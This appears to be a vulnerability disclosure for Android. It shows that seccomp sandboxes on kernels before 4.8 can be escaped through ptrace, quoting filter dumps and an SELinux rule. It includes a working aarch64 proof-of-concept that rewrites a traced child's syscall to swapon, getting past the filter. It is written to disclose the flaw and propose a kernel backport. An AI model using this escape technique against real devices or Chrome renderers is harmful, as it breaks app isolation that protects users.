162 lines
No EOL
6.7 KiB
C
162 lines
No EOL
6.7 KiB
C
/*
|
||
The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents:
|
||
|
||
Before kernel 4.8, the seccomp check will not be run again
|
||
after the tracer is notified. (This means that, on older ker‐
|
||
nels, seccomp-based sandboxes must not allow use of
|
||
ptrace(2)—even of other sandboxed processes—without extreme
|
||
care; ptracers can use this mechanism to escape from the sec‐
|
||
comp sandbox.)
|
||
|
||
Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries.
|
||
|
||
|
||
The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace:
|
||
|
||
================
|
||
===== filter 0 (164 instructions) =====
|
||
0001 if arch == AARCH64: [true +2, false +0]
|
||
[...]
|
||
0010 if nr >= 0x00000069: [true +1, false +0]
|
||
0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP
|
||
0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo)
|
||
0011 if nr >= 0x00000068: [true +18, false +17] -> ret TRAP
|
||
0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer)
|
||
[...]
|
||
002a if nr >= 0x00000018: [true +7, false +0]
|
||
0032 if nr >= 0x00000021: [true +3, false +0]
|
||
0036 if nr >= 0x00000024: [true +1, false +0]
|
||
0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir)
|
||
0037 if nr >= 0x00000022: [true +107, false +106] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: access)
|
||
0033 if nr >= 0x0000001a: [true +1, false +0]
|
||
0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: ptrace)
|
||
0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: getuid)
|
||
[...]
|
||
================
|
||
|
||
The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace:
|
||
|
||
================
|
||
# Google Breakpad (crash reporter for Chrome) relies on ptrace
|
||
# functionality. Without the ability to ptrace, the crash reporter
|
||
# tool is broken.
|
||
# b/20150694
|
||
# https://code.google.com/p/chromium/issues/detail?id=475270
|
||
allow isolated_app self:process ptrace;
|
||
================
|
||
|
||
Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace:
|
||
================
|
||
===== filter 1 (194 instructions) =====
|
||
0001 if arch == AARCH64: [true +2, false +0]
|
||
[...]
|
||
0002 if arch != ARM: [true +0, false +60] -> ret TRAP
|
||
[...]
|
||
0074 if nr >= 0x0000007a: [true +1, false +0]
|
||
0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP
|
||
00c0 ret ALLOW (syscalls: uname)
|
||
0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP
|
||
00c0 ret ALLOW (syscalls: fsync, sigreturn, clone)
|
||
[...]
|
||
004d if nr >= 0x0000001a: [true +1, false +0]
|
||
004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP
|
||
00c0 ret ALLOW (syscalls: ptrace)
|
||
[...]
|
||
===== filter 2 (449 instructions) =====
|
||
0001 if arch != ARM: [true +0, false +1] -> ret TRAP
|
||
[...]
|
||
00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid)
|
||
00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace)
|
||
01c0 ret TRAP
|
||
[...]
|
||
007f if nr >= 0x00000073: [true +0, false +5]
|
||
0080 if nr >= 0x00000076: [true +0, false +2]
|
||
0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone)
|
||
[...]
|
||
================
|
||
|
||
Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process.
|
||
|
||
|
||
To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot):
|
||
|
||
================
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
#include <unistd.h>
|
||
#include <err.h>
|
||
#include <signal.h>
|
||
#include <sys/ptrace.h>
|
||
#include <errno.h>
|
||
#include <sys/wait.h>
|
||
#include <sys/syscall.h>
|
||
#include <sys/user.h>
|
||
#include <linux/elf.h>
|
||
#include <asm/ptrace.h>
|
||
#include <sys/uio.h>
|
||
|
||
int main(void) {
|
||
setbuf(stdout, NULL);
|
||
|
||
pid_t child = fork();
|
||
if (child == -1) err(1, "fork");
|
||
if (child == 0) {
|
||
pid_t my_pid = getpid();
|
||
while (1) {
|
||
errno = 0;
|
||
int res = syscall(__NR_gettid, 0, 0);
|
||
if (res != my_pid) {
|
||
printf("%d (%s)\n", res, strerror(errno));
|
||
}
|
||
}
|
||
}
|
||
|
||
sleep(1);
|
||
|
||
if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) err(1, "ptrace attach");
|
||
int status;
|
||
if (waitpid(child, &status, 0) != child) err(1, "wait for child");
|
||
|
||
if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) err(1, "ptrace syscall entry");
|
||
if (waitpid(child, &status, 0) != child) err(1, "wait for child");
|
||
|
||
int syscallno;
|
||
struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) };
|
||
if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace getregs");
|
||
printf("seeing syscall %d\n", syscallno);
|
||
if (syscallno != __NR_gettid) errx(1, "not gettid");
|
||
syscallno = __NR_swapon;
|
||
if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace setregs");
|
||
|
||
if (ptrace(PTRACE_DETACH, child, NULL, NULL)) err(1, "ptrace syscall");
|
||
kill(child, SIGCONT);
|
||
sleep(5);
|
||
kill(child, SIGKILL);
|
||
return 0;
|
||
}
|
||
|
||
/*
|
||
================
|
||
|
||
If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached.
|
||
|
||
For comparison, the following (a straight syscall to swapon()) fails with SIGSYS:
|
||
|
||
================
|
||
#include <unistd.h>
|
||
#include <sys/syscall.h>
|
||
int main(void) {
|
||
syscall(__NR_swapon, 0, 0);
|
||
}
|
||
================
|
||
|
||
Attaching screenshot from connectbot.
|
||
|
||
I believe that a sensible fix would be to backport the behavior change that occured in kernel 4.8 to Android's stable branches.
|
||
*/ |